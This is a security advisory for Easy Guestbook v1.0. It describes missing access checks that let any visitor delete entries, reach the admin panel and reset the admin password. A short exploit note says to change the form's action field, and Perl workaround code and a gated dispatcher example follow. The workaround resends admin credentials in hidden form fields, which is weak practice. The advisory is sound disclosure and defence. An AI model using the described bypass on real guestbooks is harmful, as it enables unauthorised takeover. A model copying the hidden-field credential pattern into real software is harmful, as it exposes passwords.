COMMAND

    Easy Guestbook user privilege escalation

SYSTEMS AFFECTED

    Easy Guestbook v1.0

PROBLEM

    In AresU advisory [http://bosen.net/advisories/aresu-adv.002.txt] :

    1) Everyone can delete the entries and login as Admin Control.
    2) Everyone can reconfigure Guestbook when they open config.cgi
       and change Admin Password.

    Exploit :
    =======

    Change the action field in the HTML form.

    [attachment: easyguestbook.zip, base64-encoded MIME part, omitted]

SOLUTION

    Workaround
    ==========

    1) Add access validation on the "delete_message" function and the
       "start" function. Add admin.cgi with this code:

       # Compare the submitted login form fields against the admin
       # credentials ($username / $password) configured for the guestbook;
       # abort the request through the guestbook's own dienice() on mismatch.
       sub login_verify {
           chomp($FORM{'login_username'});
           chomp($FORM{'login_password'});
           if (!($FORM{'login_username'} eq $username
                 && $FORM{'login_password'} eq $password)) {
               dienice("Sorry, but you have entered an invalid username or password. Please press the 'back' button on your browser to return to the Login Screen.");
           }
       }

       On the first line of the "delete_message" function and the "start"
       function add this:

           &login_verify;

       And in the "start" function add this code inside the <FORM>, so the
       credentials are resubmitted with every admin action:

           <input type="hidden" name="login_username" value="$FORM{'login_username'}">
           <input type="hidden" name="login_password" value="$FORM{'login_password'}">

    2) Delete config.cgi after you finish configuring the Guestbook.
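As an added example (not part of the advisory and not Easy Guestbook's own code), the minimal CGI dispatcher below shows why choosing the handler from the action field alone was not a gate, and where the login_verify check from step 1 has to sit so that both "start" and "delete_message" are covered. The admin credentials, the form parser, the dienice() stand-in and the request string are assumed or constructed for offline use.

```perl
#!/usr/bin/perl
# Added example, not Easy Guestbook's code: action dispatch with the
# login gate from the workaround placed inside the privileged handlers.
use strict;
use warnings;

# Assumed admin credentials; the real script reads them from its config.
my $username = 'admin';
my $password = 'placeholder-password';

# Constructed request for offline testing: an anonymous visitor submits
# action=delete_message directly, never having seen the login form.
my $query = $ENV{'QUERY_STRING'} // 'action=delete_message&id=3';
my %FORM;
for my $pair (split /&/, $query) {
    my ($k, $v) = split /=/, $pair, 2;
    $v //= '';
    $v =~ tr/+/ /;
    $v =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/eg;   # URL-decode
    $FORM{$k} = $v;
}

# Stand-in for the guestbook's dienice(): report and stop the request.
sub dienice { print "Content-type: text/plain\n\n$_[0]\n"; exit 1; }

# Same check as the advisory's login_verify, with missing fields treated
# as empty so an absent login form can never pass.
sub login_verify {
    my $u = $FORM{'login_username'} // '';
    my $p = $FORM{'login_password'} // '';
    chomp($u); chomp($p);
    dienice("Sorry, but you have entered an invalid username or password.")
        unless $u eq $username && $p eq $password;
}

# Privileged handlers call login_verify first; public ones do not.
sub start          { &login_verify; print "admin control panel\n"; }
sub delete_message { &login_verify; print "deleted entry $FORM{'id'}\n"; }
sub view           { print "guestbook entries\n"; }

# The original flaw: the action name alone selected the handler, so any
# visitor could reach delete_message or start. With the gate inside those
# handlers the constructed request above is rejected; adding valid
# login_username/login_password fields to the query makes it succeed.
my %handlers = (view => \&view, start => \&start,
                delete_message => \&delete_message);
my $handler = $handlers{ $FORM{'action'} // 'view' }
    or dienice("unknown action");
$handler->();
```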